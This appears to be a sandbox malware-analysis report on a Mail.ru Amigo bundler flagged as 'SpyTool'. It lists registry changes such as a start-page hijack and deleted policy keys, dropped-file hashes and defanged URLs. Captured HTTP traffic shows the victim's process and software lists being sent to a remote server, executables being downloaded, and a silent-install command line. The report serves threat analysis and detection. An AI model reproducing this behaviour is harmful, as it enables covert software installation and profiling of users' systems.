"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Mail.Ru\IE_Bar\Settings]
"Guid" = "{6F67C475-6A4D-4589-A234-8A6A7DC0190B}"

[HKCU\Software\Microsoft\Direct3D\MostRecentApplication]
"Name" = "mailruhomesearch.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCU\Software\Mail.Ru\Tech]
"UserId" = "{2D2A2D3A-DEDD-4049-B5F0-C6075AB40E16}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "40 2E BD 5F 20 78 F3 F9 2C 86 FF 22 B8 2B 1C F6"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://mail.ru/cnt/10445?gp=789119"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

The SpyTool deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{DF701751-4490-46BF-8CE1-D7C7F7F65AD5}User]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{CD2C73D9-CA61-4961-9EBC-C101D0827F36}User]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{CD2C73D9-CA61-4961-9EBC-C101D0827F36}Machine]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{DF701751-4490-46BF-8CE1-D7C7F7F65AD5}Machine]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{DED2A586-49F3-4A06-9E1B-7E0374C350A6}Machine]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{DED2A586-49F3-4A06-9E1B-7E0374C350A6}User]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{024EE844-BB85-46F1-A0BF-67ECC14046FB}User]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{998F4C25-71BF-42BB-B628-E1CC57FFBD52}User]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{024EE844-BB85-46F1-A0BF-67ECC14046FB}Machine]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{998F4C25-71BF-42BB-B628-E1CC57FFBD52}Machine]

The SpyTool deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Secondary Start Pages"

Dropped PE files

MD5 File path
7a2e7f4486802e08f05c2b2d040dccf8 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\65025299-7BA0-4969-BF1C-4323DC267C7A\AmigoDistrib.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
CODE 4096 2196312 2196480 4.57644 9793310c97722fe4c115250998beea99
DATA 2203648 82808 82944 4.075 f4d22f949e01ad770f167390a1a30312
BSS 2289664 28657 0 0 d41d8cd98f00b204e9800998ecf8427e
.idata 2318336 11178 11264 3.43862 17135a2d9f7c72d097f3344000e9fa98
.tls 2330624 468 0 0 d41d8cd98f00b204e9800998ecf8427e
.rdata 2334720 24 512 0.146134 93ad58db0865b145b05929602cdaf8df
.reloc 2338816 130056 130560 4.63808 311b81f39ceb577e33ee1b7770aa7682
.rsrc 2469888 1406451 1406464 4.9359 f951cd30e7c665e24efe532af7f08597

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 3
6746f279c8c57afaade2c20ec159691b
37b2571e494f964c546c99a7deb1cb6f
79f744833be80fba52d7c4b88cef16c9

URLs

URL IP
hxxp://y9807akgtzcrolb.nidetafzy.ru/api
hxxp://moscow.cdnmail.ru/AmigoDistrib.exe?rfr=789104
hxxp://y9807akgtzcrolb.nidetafzy.ru/installs/1407/be5784b4.exe
hxxp://y9807akgtzcrolb.nidetafzy.ru/mailru/callback?type=mailru_amigo&zone=ua&guid={BECAF35B-D220-4E88-BAC9-7B4DC8506D5B}&ovr=0&aux=200075929
hxxp://bs.amigo.mail.ru/update/2/version.txt?ver=44.4.2403.3&kind=amigo&ds=m&BID={BECAF35B-D220-4E88-BAC9-7B4DC8506D5B}&rfr=789104&type=install 217.69.133.171
hxxp://mrds.mail.ru/update/2/version.txt?type=mru_install&GUID={1D443B71-A607-4700-8FEE-F5634008A814}&rfr=&masterid={B79E2B0C-4670-4694-BBAD-5C4C092B7D4B}&osver=xp&osbit=32&osvernum=5.1&ossp=ServicePack3&uac=0&admin=1&ver=1.17.0.150&praetorian=0&qipguard=0&yabrman=0&360ant=0&mailru_guard=0&mailru_updater=1&comp_mem=511&tool_mem=4&elapsed_time=0&mr_service=0&ovr=0&tool=mrupdater 217.69.133.170
hxxp://mrds.mail.ru/update/2/version.txt?type=mru_online&GUID={1D443B71-A607-4700-8FEE-F5634008A814}&rfr=&tool=mrupdater&masterid={B79E2B0C-4670-4694-BBAD-5C4C092B7D4B}&osver=xp&osbit=32&osvernum=5.1&ossp=ServicePack3&uac=0&admin=1&ver=1.17.0.150&praetorian=0&qipguard=0&yabrman=0&360ant=0&mailru_guard=0&mailru_updater=1&comp_mem=511&tool_mem=4&elapsed_time=0&mr_service=0 217.69.133.170
hxxp://binupdate.mail.ru/updater/version.xml?masterid={B79E2B0C-4670-4694-BBAD-5C4C092B7D4B}&osver=xp&osbit=32&osvernum=5.1&ossp=ServicePack3&uac=0&admin=1&ver=1.17.0.150&tool=mrupdater&guid={1D443B71-A607-4700-8FEE-F5634008A814}&praetorian=0&qipguard=0&yabrman=0&360ant=0&mailru_guard=0&mailru_updater=1&comp_mem=511&tool_mem=5&elapsed_time=0&mr_service=0 217.69.134.55
hxxp://mrds.mail.ru/update/2/version.txt?type=mru_online_service&GUID={1D443B71-A607-4700-8FEE-F5634008A814}&rfr=&tool=mrupdater&masterid={B79E2B0C-4670-4694-BBAD-5C4C092B7D4B}&osver=xp&osbit=32&osvernum=5.1&ossp=ServicePack3&uac=0&admin=1&ver=1.17.0.150&praetorian=0&qipguard=0&yabrman=0&360ant=0&mailru_guard=0&mailru_updater=1&comp_mem=511&tool_mem=4&elapsed_time=0&mr_service=1 217.69.133.170
hxxp://mrds.mail.ru/update/2/version.txt?type=mru_install_service&GUID={1D443B71-A607-4700-8FEE-F5634008A814}&rfr=&tool=mrupdater&masterid={B79E2B0C-4670-4694-BBAD-5C4C092B7D4B}&osver=xp&osbit=32&osvernum=5.1&ossp=ServicePack3&uac=0&admin=1&ver=1.17.0.150&praetorian=0&qipguard=0&yabrman=0&360ant=0&mailru_guard=0&mailru_updater=1&comp_mem=511&tool_mem=6&elapsed_time=1&mr_service=0 217.69.133.170
hxxp://binupdate.mail.ru/amigo/version2.xml?masterid={B79E2B0C-4670-4694-BBAD-5C4C092B7D4B}&osver=xp&osbit=32&osvernum=5.1&ossp=ServicePack3&uac=0&admin=1&ver=1.17.0.150&tool=mrupdater&guid={1D443B71-A607-4700-8FEE-F5634008A814}&praetorian=0&qipguard=0&yabrman=0&360ant=0&mailru_guard=0&mailru_updater=1&comp_mem=511&tool_mem=5&elapsed_time=0&mr_service=0 217.69.134.55
hxxp://binupdate.mail.ru/cache_policy.mrdj 217.69.134.55
hxxp://binupdate.mail.ru/tasks.mrdj?masterid={B79E2B0C-4670-4694-BBAD-5C4C092B7D4B}&osver=xp&osbit=32&osvernum=5.1&ossp=ServicePack3&uac=0&admin=1&ver=1.17.0.150&tool=mrupdater&guid={1D443B71-A607-4700-8FEE-F5634008A814}&praetorian=0&qipguard=0&yabrman=0&360ant=0&mailru_guard=0&mailru_updater=1&comp_mem=511&tool_mem=5&elapsed_time=0&mr_service=1 217.69.134.55
hxxp://binupdate.mail.ru/audit_config.mrdj 217.69.134.55
hxxp://binupdate.mail.ru/tasks/shortcuts.mrdj?masterid={B79E2B0C-4670-4694-BBAD-5C4C092B7D4B}&osver=xp&osbit=32&osvernum=5.1&ossp=ServicePack3&uac=0&admin=1&ver=1.17.0.150&tool=mrupdater&guid={1D443B71-A607-4700-8FEE-F5634008A814}&praetorian=0&qipguard=0&yabrman=0&360ant=0&mailru_guard=0&mailru_updater=1&comp_mem=511&tool_mem=6&elapsed_time=1&mr_service=1 217.69.134.55
hxxp://mrds.mail.ru/update/2/version.txt?type=mruinfo&GUID={1D443B71-A607-4700-8FEE-F5634008A814}&rfr=&masterid={B79E2B0C-4670-4694-BBAD-5C4C092B7D4B}&osver=xp&osbit=32&osvernum=5.1&ossp=ServicePack3&uac=0&admin=1&ver=1.17.0.150&praetorian=0&qipguard=0&yabrman=0&360ant=0&mailru_guard=0&mailru_updater=1&comp_mem=511&tool_mem=6&elapsed_time=1&mr_service=0&tool=mrupdater&amigo_conv=1&ovr_amigo=0&ovr_internet=0&ovr_chrome=0&ie_ver=6.0.2900.5512&iedse=&iehp= 217.69.133.170
hxxp://contentdefender-cis1.org/install/start/sourceid/106/campaignid/1/userid/5D8B415E-D533-4EF4-AFB9-E19F1E9F7CCE/siteid/200075929/version/118
hxxp://binupdate.mail.ru/tasks/shortcuts.mrdj?masterid={B79E2B0C-4670-4694-BBAD-5C4C092B7D4B}&osver=xp&osbit=32&osvernum=5.1&ossp=ServicePack3&uac=0&admin=1&ver=1.17.0.150&tool=mrupdater&guid={1D443B71-A607-4700-8FEE-F5634008A814}&praetorian=0&qipguard=0&yabrman=0&360ant=0&mailru_guard=0&mailru_updater=1&comp_mem=511&tool_mem=7&elapsed_time=7&mr_service=1 217.69.134.55
hxxp://xml.binupdate.mail.ru/tasks.mrdj?masterid={B79E2B0C-4670-4694-BBAD-5C4C092B7D4B}&osver=xp&osbit=32&osvernum=5.1&ossp=ServicePack3&uac=0&admin=1&ver=1.17.0.150&tool=mrupdater&guid={1D443B71-A607-4700-8FEE-F5634008A814}&praetorian=0&qipguard=0&yabrman=0&360ant=0&mailru_guard=0&mailru_updater=1&comp_mem=511&tool_mem=5&elapsed_time=0&mr_service=1 217.69.134.55
hxxp://xml.binupdate.mail.ru/cache_policy.mrdj 217.69.134.55
hxxp://xml.binupdate.mail.ru/tasks/shortcuts.mrdj?masterid={B79E2B0C-4670-4694-BBAD-5C4C092B7D4B}&osver=xp&osbit=32&osvernum=5.1&ossp=ServicePack3&uac=0&admin=1&ver=1.17.0.150&tool=mrupdater&guid={1D443B71-A607-4700-8FEE-F5634008A814}&praetorian=0&qipguard=0&yabrman=0&360ant=0&mailru_guard=0&mailru_updater=1&comp_mem=511&tool_mem=6&elapsed_time=1&mr_service=1 217.69.134.55
hxxp://xml.binupdate.mail.ru/audit_config.mrdj 217.69.134.55
hxxp://amigobin.cdnmail.ru/AmigoDistrib.exe?rfr=789104 94.100.180.110
hxxp://cuidu.sevential.ru/mailru/callback?type=mailru_amigo&zone=ua&guid={BECAF35B-D220-4E88-BAC9-7B4DC8506D5B}&ovr=0&aux=200075929
hxxp://xml.binupdate.mail.ru/tasks/shortcuts.mrdj?masterid={B79E2B0C-4670-4694-BBAD-5C4C092B7D4B}&osver=xp&osbit=32&osvernum=5.1&ossp=ServicePack3&uac=0&admin=1&ver=1.17.0.150&tool=mrupdater&guid={1D443B71-A607-4700-8FEE-F5634008A814}&praetorian=0&qipguard=0&yabrman=0&360ant=0&mailru_guard=0&mailru_updater=1&comp_mem=511&tool_mem=7&elapsed_time=7&mr_service=1 217.69.134.55


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Suspicious User-Agent (FULLSTUFF)

Traffic

GET /tasks/shortcuts.mrdj?masterid={B79E2B0C-4670-4694-BBAD-5C4C092B7D4B}&osver=xp&osbit=32&osvernum=5.1&ossp=ServicePack3&uac=0&admin=1&ver=1.17.0.150&tool=mrupdater&guid={1D443B71-A607-4700-8FEE-F5634008A814}&praetorian=0&qipguard=0&yabrman=0&360ant=0&mailru_guard=0&mailru_updater=1&comp_mem=511&tool_mem=6&elapsed_time=1&mr_service=1 HTTP/1.1
Host: xml.binupdate.mail.ru
Accept: */*
User-Agent: RemoteConfigFetcher
Connection: close


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 25 Dec 2015 20:36:40 GMT
Content-Type: application/x-mrd
Connection: close
Content-Transfer-Encoding: 8bit
Content-Length: 10105
d.=<;:;K.yg`pge@`bdor(3(|.%$#"! ...n^YV_Y_A]\\...U'..............0&
lt;>7?=zmv!&&7}Zonmlkjihgfeda.$!.1...XCX...._xQPONMLKJIHGFG)..%....
......................................................................
......................................................v{?0.:9876543210
/.-, (Kaigw}OmbaKWRRH...l<.......................,2;);4.>:0'v}.&
gt;; ?".>i.?6) 1'3o........Y...QxQPONMLKJIHGFEDCB<L.............
......................................................................
............................................l<'<@.9876543210/.-,
*)('&'MmvdrQ[I.~BITXDPF.[TH_BB^Nvu.B^@..(...~}|{zyxwvutsr.|Enmlkjihgf
edcba`_\4...5.......!.......KRG=oDCBA@................................
.....j....d1...a/....z.....t........n....S....d.......................
....................5Q...1w~s?85.76543210/.-, *)('&%$!^].cb..gf.dk..]h
W..ruU..wrX..xHxM...,.9.....x7.2...;..b./....=....%.. XYVsXWVUTSRQPONM
LKJIHGFEF...................@:...Z....W.....P.....j.......b....|)...x.
...............................................'C...#t...<l....7X..
..1.CA@5A|..KNl..LKj..Q/(%.'&%$#"! .............BC_H\LR..@FSCWJ]..I.;.
...!....$...<.!...8.-.....l.%.. '...%,....VS\eNMLKJIHGFEDCBA@......
................Y=...U....n>....i.....c.......{....w ...q..........
...................................."D...<i...9g....2_BlFy..DDK8wOr
..M{RQ"Po..Z]}.._Ze..`...3......................KzE....#....&...>.?
...>./.....j!. ..#. 'T"...(/...-4...6NKbGFEDCBA@...................
..................................................................

<<< skipped >>>

GET /AmigoDistrib.exe?rfr=789104 HTTP/1.1
Host: amigobin.cdnmail.ru
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 25 Dec 2015 20:35:58 GMT
Content-Type: application/octet-stream
Content-Length: 48920808
Connection: keep-alive
Last-Modified: Fri, 25 Dec 2015 13:48:50 GMT
ETag: "567d4942-2ea78e8"
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........D.^.*E^.*E
^.*E...E_.*ES..EI.*ES..EP.*ES..E>.*E.C.EY.*E^. E9.*E#..EY.*ES..E_.*
E^..E].*E#..E_.*ERich^.*E........PE..L...>EKV......................
.......Z............@.................................7...............
........................X1..P....@..X>...........V..."..........@..
.8............................N..@............0..X....................
........text............................... ..`.data..................
.............@....idata.......0......................@..@.rsrc...X>
...@...@..................@..@.reloc...............J..............@..B
......................................................................
......................................................................
......................................................................
......................................................................
.....................................................................m
@.ku@...@.*.@..........~@...@...@.....................>EKV........^
...0O..0C......>EKV.............O...C..{.8.A.6.9.D.3.4.5.-.D.5.6.4.
-.4.6.3.c.-.A.F.F.1.-.A.6.9.D.9.E.5.3.0.F.9.6.}.....{.4.e.a.1.6.a.c.7.
-.f.d.5.a.-.4.7.c.3.-.8.7.5.b.-.d.b.f.4.a.2.0.0.8.c.2.0.}.....{.8.B.A.
9.8.6.D.A.-.5.1.0.0.-.4.0.5.E.-.A.A.3.5.-.8.6.F.3.4.A.0.2.A.C.B.F.}...
..{.4.D.C.8.B.4.C.A.-.1.B.D.A.-.4.8.3.e.-.B.5.F.A.-.D.3.C.1.2.E.1.5.B.
6.2.D.}.....-.-.c.h.r.o.m.e.-.s.x.s.....-.-.c.h.r.o.m.e.....-.-.c.

<<< skipped >>>

POST /install/start/sourceid/106/campaignid/1/userid/5D8B415E-D533-4EF4-AFB9-E19F1E9F7CCE/siteid/200075929/version/118 HTTP/1.1
Accept: text/*
Content-Type: application/x-www-form-urlencoded; charset=utf8
User-Agent: ContentDefender
Host: contentdefender-cis1.org
Content-Length: 2018
Cache-Control: no-cache

data={"os":"Windows 5.1 32 bit",
"processlist":["[system process]","system","smss.exe","csrss.exe","winlogon.exe","services.exe","lsass.exe","vmacthlp.exe","svchost.exe","svchost.exe","svchost.exe","svchost.exe","svchost.exe","spoolsv.exe","jqs.exe","vmtoolsd.exe","alg.exe","explorer.exe","vmwaretray.exe","vmtoolsd.exe","sandbox_svc.exe","cmd.exe","tshark.exe","cmd.exe","procmon.exe","wmiprvse.exe","d24f367079cc483e84027cd8d8ae770d.exe","mailruupdater.exe","mailruupdater.exe","condefsetup (19).exe"],"programlist":["Adobe Flash Player 11 ActiveX","Update for Windows XP (KB898461)","Microsoft .NET Framework 3.5","Microsoft .NET Framework 4 Client Profile","Total Commander (Remove or Repair)","WinPcap 4.0.1","Wireshark 0.99.6a","XML Paper Specification Shared Components Pack 1.0","Microso
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 25 Dec 2015 20:36:42 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.41-0 deb7u1
2f..{"GUID":"5D8B415E-D533-4EF4-AFB9-E19F1E9F7CCE"}..0..HTTP/1.1 200 O
K..Server: nginx..Date: Fri, 25 Dec 2015 20:36:42 GMT..Content-Type: a
pplication/json..Transfer-Encoding: chunked..Connection: keep-alive..X
-Powered-By: PHP/5.4.41-0 deb7u1..2f..{"GUID":"5D8B415E-D533-4EF4-AFB9
-E19F1E9F7CCE"}..0..


GET /tasks.mrdj?masterid={B79E2B0C-4670-4694-BBAD-5C4C092B7D4B}&osver=xp&osbit=32&osvernum=5.1&ossp=ServicePack3&uac=0&admin=1&ver=1.17.0.150&tool=mrupdater&guid={1D443B71-A607-4700-8FEE-F5634008A814}&praetorian=0&qipguard=0&yabrman=0&360ant=0&mailru_guard=0&mailru_updater=1&comp_mem=511&tool_mem=5&elapsed_time=0&mr_service=1 HTTP/1.1
Host: xml.binupdate.mail.ru
Accept: */*
User-Agent: RemoteConfigFetcher
Connection: close


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 25 Dec 2015 20:36:39 GMT
Content-Type: application/x-mrd
Connection: close
Content-Transfer-Encoding: 8bit
Content-Length: 8330
d..>O{jsd4/4h...-uO:8K?L60(0E71-..~...{~..t.w.t..m.imnT...^.* (.:0&
lt;~az-*"3y^Z[Xr=;#%/hshvwiNJKHb....Y@YZ.......RCddebH.......=........
......................................................................
...................................................~wqnn4z|y{t}.<ce
ibShb.jjYge`i/7E.7523D2>?H.9;8.T....n.j.....a....oq.cimzocd..f.z}u
y.7krg=OMJKc%.._F[....Z.}z{S.....IPIYWJomjkC..........................
......................................................................
................................ .1....:dsgbzqtO.|dcyc}q%<%pqwd,574
5.N@HR....BTBFAIEH.."./,.`WRT03.=);4 ulu/Y[XYFl.$.)"."*$=axaquwtu.ppq.
Z.}zP.4, ]R( E&$SUNVY&...............................................
......................................................................
........../'/1/#/-:. VQ?PQ>KI4NHKK?Cx&9"z.674.^TX...AFFW.:&'$.Y_GAC
......*VWT~(? .>50.# 8?='95ipi<53 hIKHI]....XCXU.......Mdde.Fcan
D.T&&SS...............................................................
................................................................=]hoou
tHvdty`0 0t..... KocfoGgmaF....001>K?=:O.:&'.W...i.........si.kjt.n
bey.bh.~{u..xz.:d.d8HHIv\...XCX...._xxyfL.....J]FTTOhhi...............
......................................................................
..........................................?/-0....5epfe{ruP~.edx`|~$?$
wpte.4452.MAGS....^^JZDAN.#!.[..* .[.....j.`z.mma.eh~.`u.s{e...rpuwx9H
HE.XCX.||}zP...LWL.....JomjkC.........................................
..................................................................

<<< skipped >>>

GET /updater/version.xml?masterid={B79E2B0C-4670-4694-BBAD-5C4C092B7D4B}&osver=xp&osbit=32&osvernum=5.1&ossp=ServicePack3&uac=0&admin=1&ver=1.17.0.150&tool=mrupdater&guid={1D443B71-A607-4700-8FEE-F5634008A814}&praetorian=0&qipguard=0&yabrman=0&360ant=0&mailru_guard=0&mailru_updater=1&comp_mem=511&tool_mem=5&elapsed_time=0&mr_service=0 HTTP/1.1
Host: binupdate.mail.ru
Accept: */*
User-Agent: MailRuUpdater
Connection: close


HTTP/1.1 503 Service Temporarily Unavailable
Server: nginx
Date: Fri, 25 Dec 2015 20:36:39 GMT
Content-Type: text/html
Content-Length: 206
Connection: close
<html>..<head><title>503 Service Temporarily Unavail
able</title></head>..<body bgcolor="white">..<cen
ter><h1>503 Service Temporarily Unavailable</h1></ce
nter>..<hr><center>nginx</center>..</body>.
.</html>....


GET /update/2/version.txt?type=mru_online_service&GUID={1D443B71-A607-4700-8FEE-F5634008A814}&rfr=&tool=mrupdater&masterid={B79E2B0C-4670-4694-BBAD-5C4C092B7D4B}&osver=xp&osbit=32&osvernum=5.1&ossp=ServicePack3&uac=0&admin=1&ver=1.17.0.150&praetorian=0&qipguard=0&yabrman=0&360ant=0&mailru_guard=0&mailru_updater=1&comp_mem=511&tool_mem=4&elapsed_time=0&mr_service=1 HTTP/1.1
Host: mrds.mail.ru
Accept: */*
User-Agent: FULLSTUFF
Connection: close


HTTP/1.1 204 No Content
Server: nginx
Date: Fri, 25 Dec 2015 20:36:39 GMT
Connection: close


GET /update/2/version.txt?type=mruinfo&GUID={1D443B71-A607-4700-8FEE-F5634008A814}&rfr=&masterid={B79E2B0C-4670-4694-BBAD-5C4C092B7D4B}&osver=xp&osbit=32&osvernum=5.1&ossp=ServicePack3&uac=0&admin=1&ver=1.17.0.150&praetorian=0&qipguard=0&yabrman=0&360ant=0&mailru_guard=0&mailru_updater=1&comp_mem=511&tool_mem=6&elapsed_time=1&mr_service=0&tool=mrupdater&amigo_conv=1&ovr_amigo=0&ovr_internet=0&ovr_chrome=0&ie_ver=6.0.2900.5512&iedse=&iehp= HTTP/1.1
Host: mrds.mail.ru
Accept: */*
User-Agent: FULLSTUFF
Connection: close


HTTP/1.1 204 No Content
Server: nginx
Date: Fri, 25 Dec 2015 20:36:40 GMT
Connection: close


POST /api HTTP/1.0
Connection: keep-alive
Content-Length: 158
Host: y9807akgtzcrolb.nidetafzy.ru
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)

....x.-.
.1E..k.i.6..M.0.(.. ....d.s!9...E.Z.P.#'......&2 .e.Y..{..ywr..2.........Y..,.bO..i0.(c06-.8..s..e.`.,.....i.?.'`....o..eb'F.E{.L.ZR-.ScQ....|...4.
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Fri, 25 Dec 2015 20:36:41 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.17
7...x...... ...^...8.n..73|3..].......C.......b..5&....U..9.........


GET /amigo/version2.xml?masterid={B79E2B0C-4670-4694-BBAD-5C4C092B7D4B}&osver=xp&osbit=32&osvernum=5.1&ossp=ServicePack3&uac=0&admin=1&ver=1.17.0.150&tool=mrupdater&guid={1D443B71-A607-4700-8FEE-F5634008A814}&praetorian=0&qipguard=0&yabrman=0&360ant=0&mailru_guard=0&mailru_updater=1&comp_mem=511&tool_mem=5&elapsed_time=0&mr_service=0 HTTP/1.1
Host: binupdate.mail.ru
Accept: */*
User-Agent: MailRuUpdater
Connection: close


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 25 Dec 2015 20:36:39 GMT
Content-Type: text/xml; charset=utf-8
Connection: close
Content-Length: 282
<?xml version="1.0" encoding="utf-8" ?>.<xml>.<product_
name>Amigo</product_name>.<version>32.0.1725.115</ve
rsion>.<fetch_url>hXXp://amigo.cdnmail.ru/amigo_setup.exe<
/fetch_url>.<md5>116046f0563f48b6e6cf012b6cff3d75</md5>
.<cmd_line>.--silent --launch --tray-launch.</cmd_line>.&l
t;/xml>..


GET /mailru/callback?type=mailru_amigo&zone=ua&guid={BECAF35B-D220-4E88-BAC9-7B4DC8506D5B}&ovr=0&aux=200075929 HTTP/1.1
User-Agent: Amigo Setup
Host: cuidu.sevential.ru
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Fri, 25 Dec 2015 20:36:36 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.17
0..HTTP/1.1 200 OK..Server: nginx/1.4.2..Date: Fri, 25 Dec 2015 20:36:
36 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chu
nked..Connection: keep-alive..X-Powered-By: PHP/5.4.17..0..


GET /update/2/version.txt?ver=44.4.2403.3&kind=amigo&ds=m&BID={BECAF35B-D220-4E88-BAC9-7B4DC8506D5B}&rfr=789104&type=install HTTP/1.1
User-Agent: Amigo Setup
Host: bs.amigo.mail.ru
Cache-Control: no-cache


HTTP/1.1 204 No Content
Server: nginx
Date: Fri, 25 Dec 2015 20:36:36 GMT
Connection: keep-alive
HTTP/1.1 204 No Content..Server: nginx..Date: Fri, 25 Dec 2015 20:36:3
6 GMT..Connection: keep-alive..


GET /cache_policy.mrdj HTTP/1.1
Host: xml.binupdate.mail.ru
Accept: */*
Connection: close


HTTP/1.1 503 Service Temporarily Unavailable
Server: nginx
Date: Fri, 25 Dec 2015 20:36:39 GMT
Content-Type: text/html
Content-Length: 206
Connection: close
<html>..<head><title>503 Service Temporarily Unavail
able</title></head>..<body bgcolor="white">..<cen
ter><h1>503 Service Temporarily Unavailable</h1></ce
nter>..<hr><center>nginx</center>..</body>.
.</html>....


GET /tasks/shortcuts.mrdj?masterid={B79E2B0C-4670-4694-BBAD-5C4C092B7D4B}&osver=xp&osbit=32&osvernum=5.1&ossp=ServicePack3&uac=0&admin=1&ver=1.17.0.150&tool=mrupdater&guid={1D443B71-A607-4700-8FEE-F5634008A814}&praetorian=0&qipguard=0&yabrman=0&360ant=0&mailru_guard=0&mailru_updater=1&comp_mem=511&tool_mem=7&elapsed_time=7&mr_service=1 HTTP/1.1
Host: xml.binupdate.mail.ru
Accept: */*
User-Agent: RemoteConfigFetcher
Connection: close


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 25 Dec 2015 20:36:46 GMT
Content-Type: application/x-mrd
Connection: close
Content-Transfer-Encoding: 8bit
Content-Length: 10105
d.=<;:;K.yg`pge@`bdor(3(|.%$#"! ...n^YV_Y_A]\\...U'..............0&
lt;>7?=zmv!&&7}Zonmlkjihgfeda.$!.1...XCX...._xQPONMLKJIHGFG)..%....
......................................................................
......................................................v{?0.:9876543210
/.-, (Kaigw}OmbaKWRRH...l<.......................,2;);4.>:0'v}.&
gt;; ?".>i.?6) 1'3o........Y...QxQPONMLKJIHGFEDCB<L.............
......................................................................
............................................l<'<@.9876543210/.-,
*)('&'MmvdrQ[I.~BITXDPF.[TH_BB^Nvu.B^@..(...~}|{zyxwvutsr.|Enmlkjihgf
edcba`_\4...5.......!.......KRG=oDCBA@................................
.....j....d1...a/....z.....t........n....S....d.......................
....................5Q...1w~s?85.76543210/.-, *)('&%$!^].cb..gf.dk..]h
W..ruU..wrX..xHxM...,.9.....x7.2...;..b./....=....%.. XYVsXWVUTSRQPONM
LKJIHGFEF...................@:...Z....W.....P.....j.......b....|)...x.
...............................................'C...#t...<l....7X..
..1.CA@5A|..KNl..LKj..Q/(%.'&%$#"! .............BC_H\LR..@FSCWJ]..I.;.
...!....$...<.!...8.-.....l.%.. '...%,....VS\eNMLKJIHGFEDCBA@......
................Y=...U....n>....i.....c.......{....w ...q..........
...................................."D...<i...9g....2_BlFy..DDK8wOr
..M{RQ"Po..Z]}.._Ze..`...3......................KzE....#....&...>.?
...>./.....j!. ..#. 'T"...(/...-4...6NKbGFEDCBA@...................
..................................................................

<<< skipped >>>

GET /audit_config.mrdj HTTP/1.1
Host: xml.binupdate.mail.ru
Accept: */*
User-Agent: RemoteConfigFetcher
Connection: close


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 25 Dec 2015 20:36:39 GMT
Content-Type: application/x-mrd
Connection: close
Content-Transfer-Encoding: 8bit
Content-Length: 43
d.=<;:;[.sv.`Fx}jGcxnx.iku'$9"Z3........j<H..


POST /api HTTP/1.0
Connection: keep-alive
Content-Length: 160
Host: y9807akgtzcrolb.nidetafzy.ru
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)

